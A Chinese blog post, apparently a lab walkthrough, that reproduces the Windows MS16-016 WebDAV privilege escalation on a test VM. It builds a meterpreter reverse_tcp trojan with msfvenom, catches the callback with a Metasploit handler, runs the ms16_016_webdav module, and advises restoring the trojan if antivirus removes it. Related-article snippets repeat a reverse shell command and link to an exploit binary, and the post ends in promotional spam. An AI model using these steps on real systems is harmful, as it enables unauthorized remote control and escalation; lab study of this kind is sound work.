MS16_016 漏洞利用与安全加固_exploit windows local ms16_016_webdav

最新推荐文章于 2024-08-14 08:18:43 发布
最新推荐文章于 2024-08-14 08:18:43 发布
阅读量836 收藏 27
点赞数 15
分类专栏: 2024年程序员学习 文章标签: 安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78398209/article/details/137657977
版权

环境说明

  • 渗透机操作系统:kali-linux-2024.1-installer-amd64
  • 漏洞复现操作系:cn_windows_7_professional_with_sp1_x64_dvd_u_677031

1 MS16_016 简介

MS16_016 漏洞产生的原因是由于 Windows 中的 WebDAV(分布式创作和版本管理)未正确处理客户端发送的信息,攻击者可以运行经过特殊设计的应用程序,从而提升权限。

2 MS16_016 复现过程

在开始之前请关闭靶机的防火墙, 关于渗透机和靶机环境的搭建可自行Bing

靶机需 32位 Windows系统,一定是32位的操作系统,要不然不能成功实现,有知道原因的可以留言

步骤01、

打开网络拓补,单机 “启动”按钮,启动实现虚拟机,如图所示。
在这里插入图片描述

步骤02、

使用 ifconfigipconfig命令分别获取渗透机和靶机的IP的地址,使用ping 命令进行网络 连通性测试,确保网络可达。

渗透机的IP 地址为 192.168.254.134,如图所示。

渗透机的IP地址

在这里插入图片描述

靶机的IP地址为 192.168.254.131,如图所示。

靶机的IP地址

在这里插入图片描述

步骤03、

在 Kali 终端下 使用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=渗透机IP LPORT=木马通信端口 -f 输出格式 > 文件名 命令 生成木马文件,如图所示。

-p 指定需要使用的 载荷(Payload)

在这里插入图片描述

命令执行结束,在 /home/kali 目录下创建文件 theRavensea.exe ,如图所示。

文件生成在我们当前终端所在的目录下

在这里插入图片描述

步骤04、

使用 msfconsole 命令启动Metasploit 渗透测试平台,如图所示。

启动 Metasploit

在这里插入图片描述

步骤05、

使用 use /exploit/multi/handler 命令调用监听模块,同时使用 set payload windows/meterpreter/reverse_tcp 命令,设置本地监听的地址 192.168.254.134,设置监听端口 8888,最后使用 show options 命令查看最终的配置,如图所示。

查看配置参数 (端口号要与生成木马的端口号一致)

在这里插入图片描述

使用 run 或者 exploit 开启监听模式

运行溢出模块

在这里插入图片描述

步骤06、

将步骤3 中创建的木马文件复制到靶机中。复制过程中如果木马文件被安全软件删除,恢复即可。再运行木马,运行结束后,渗透机将会获得一个 meterpreter 会话,如图所示。

在靶机中打开 木马程序运行

在这里插入图片描述

获得 session 会话

在这里插入图片描述

步骤07、

使用 shell 命令启动 Meterpreter 下 cmd 的 Shell 终端,如图所示。

获取操作系统的 Shell

在这里插入图片描述

使用 whoami 命令查看当前的系统权限,如图所示。

查看用户权限

在这里插入图片描述

步骤08、

使用 background 命令将会话置于后台,会话编号为 1,如图所示。

exit 退出 Shell 终端

在这里插入图片描述

步骤09、

使用 use exploit/windows/local/ms16_016_webdav 命令调用漏洞利用模块,同时使用 set SESSION 命令设置刚才获得权限的会话,使用 set LPORT 命令设置载荷模块的监听的本地端口,然后使用 run 或者 exploit 命令运行该模块,如图所示。

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-VcURAlAY-1712850837924)]

2301_78398209
关注
  • 15
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MS16-016漏洞复现
qq_45440239的博客
06-01 1783
复现MS16-016漏洞
MS08067/MS10061漏洞靶机环境搭建总结
热门推荐
SQL_injection的专栏
08-15 1万+
MS08067/MS10061漏洞靶机环境搭建总结
ms16-016提权
qq_54713392的博客
05-08 1197
ms16-016提权 简介:靶机需32位windows系统 攻击机:kali IP地址为:192.168.32.132 目标机:windows32 IP地址:192.168.32.135 先ping两台主机看是否通 步骤: 1)生成木马,设置本地ip地址192.168.32.132和端口号4444 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 LPORT=4444 -f exe > /root/test.exe 2)
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 741
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
MS16_016 漏洞利用安全加固
theRavensea
03-18 847
MS16_016 漏洞产生的原因是由于 Windows 中的 WebDAV(分布式创作和版本管理)未正确处理客户端发送的信息,攻击者可以运行经过特殊设计的应用程序,从而提升权限。
M_D77MS16 FB库
11-23
【M_D77MS16 FB库】是一个重要的工业自动化领域的软件组件,主要应用于西门子的S7-1500系列PLC(可编程逻辑控制器)中的功能块(Function Block,FB)。在PLC编程中,FB是用于封装特定功能的模块化程序结构,便于...
ms16-032本地溢出漏洞
06-27
【标题】:“ms16-032本地溢出漏洞”是微软在2016年发布的一个重要的安全更新,该漏洞主要影响Windows操作系统。这个漏洞的命名方式遵循了微软的传统,即“ms”代表微软,“16”代表2016年,而“032”则可能是该年中...
记一次HW实战笔记 _ 艰难的提权爬坑1
08-03
在本文中,我们将深入探讨一次HW实战中的提权攻防过程,主要涉及SQL数据库、Windows系统漏洞利用、网络协议和安全工具的运用。首先,实战起始于一个已知的SQL Server 2008数据库注入点,攻击者借此获得了网站的...
QD77ms视频教程 MS2 ms4 MS16的JOG及原点程序讲解
07-05
第4集 QD77ms视频教程 MS2 ms4 MS16的JOG及原点程序讲解 第5集 定位控制的几种方式 第6集 让马达按规定速度一直转动 一直正转或者反转 第7集 中途走了一节 停止了 如何重新启动 第8集 当前定位数据监控 和如何将当前...
QD77MS16 范例程序
03-17
通过这个"TEST.gxw"文件,开发者可以学习如何编写针对QD77MS16的控制程序,了解如何利用其强大的功能来实现精确的步进电机控制。实际操作时,需要配合硬件设备,将程序下载到QD77MS16中,然后观察电机的实际运行效果...
MS08067,MS10061漏洞靶机环境搭建.docx
07-07
MS08067,MS10061漏洞靶机环境搭建过程,演示靶机的搭建过程,用于攻防演练,渗透小白可以看一下
通过msf复现漏洞ms16-016
NatusVincere
03-20 77
攻击者可以利用特意构造的应用程序或网页来绕过这些权限控制,使得攻击者可以在系统内核态执行恶意代码,并且获取系统权限。通过利用这个漏洞,攻击者可以执行未经授权的代码,获取系统敏感信息,或者潜在地导致拒绝服务情况。修复这个漏洞需要微软对Windows内核和相关的权限验证机制进行修复,以确保系统能够正确地限制和验证用户模式与内核模式之间的通信,从而防止类似的安全功能绕过问题。这个漏洞主要由两个方面组成:一是Windows内核对于用户模式与内核模式的通信机制出现了缺陷,使得攻击者可以进行越权操作;
Kali利用msf对MS10_061漏洞进行渗透测试
qq_50854662的博客
05-29 1990
注意事项: kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待!本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!! 1. Metasploit简介 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。详细介绍可以参考百度百科对 Mettasploit 的介绍。 2.打印后.
[提权]MS16-016提权EXP
weixin_30621711的博客
01-12 1419
MS16-016提权EXP[K8]Tested On Win7 x86Usage: ms16-016_win7.exe "whoami"by K8拉登哥哥 20160216下载:http://pan.baidu.com/s/1c1r45c0 转载于:https://www.cnblogs.com/k8gege/p/10261356.html
记一次ms16-032成功提权win7/win12
weixin_30608503的博客
04-03 526
E:\Tools\提权大结合\ms16-032>whoami pc-20140503jfge\administrator   首先查看权限是administrator 随后溢出 可以看到是system权限了 这是拿我本机试的。 可以在win12上成功溢出 exp不开源 转载于:https://www.cnblogs.com/wh4am1/p/6663998...
MS16-016 提权EXP
angaoux03775的博客
02-28 376
测试环境win732位未打任何补丁 1、使用netuser指令测试得到结果没有权限新建用户 2.查看系统用户 3、复制EXP到win7下使用命令打开添加新用户再查看用户列表 转载于:https://www.cnblogs.com/sevck/p/5225643.html...
CVE-2016-0051(WebDaV)漏洞复现
yangbz123的博客
08-08 1639
MS16-016(WebDaV)漏洞复现 目标机:win7x64 192.168.235.142 攻击机:kali 192.168.235.137 1、 确定目标主机和攻击机能够ping通 2、 启动kaliLinux终端利用msfvenom生成后门 输入命令msfvenom -p(-p用来设置参数的) windows/meterpreter/reverse_tcp LHOST=192.168.235.137(LHOST用来设置本地主机ip) LPORT=2222(LPORT=2222用来设置本地监听端
漫漫漏洞复现之旅---第一天(MS-08-067)
d1303850859的博客
02-29 527
MS08-067复现 漏洞原理简述:攻击者可以利用该漏洞向网络中的电脑发出远程的特制RPC请求,无需身份验证便可在电脑中任意执行远程代码。 漏洞环境:至少为Windows 2000/XP/Server 2003/Vista/Server 2008 攻击者:kali 被入侵者:win2003 打开msfconsole 2. 查询漏洞命令:search 08-067 3. 调用漏洞 IP为空...
安全:企业上云后不可忽视的安全挑战与解决方案
最新发布
A526847的博客
08-14 287
企业上云是数字化转型的必然趋势,但云安全风险也如影随形。企业必须正视云安全挑战,采取切实有效的措施来保障云安全。通过数据加密、访问控制、安全审计、备份与恢复、灾备管理、选择可信的云服务供应商和加强内部安全管理等手段,企业可以构建完善的云安全体系,确保云服务的可靠性和安全性。在未来的数字化转型中,云安全将成为企业不可或缺的重要保障。
提权实战:MS16-075漏洞利用与Meterpreter反弹
利用Meterpreter工具,他们检查了目标系统的漏洞补丁更新情况,包括使用msf反弹进行补丁枚举和windows-exploit-suggester.py进行漏洞审计,以评估系统的安全状况。 重点环节在于利用MS16-075漏洞进行提权,这个漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值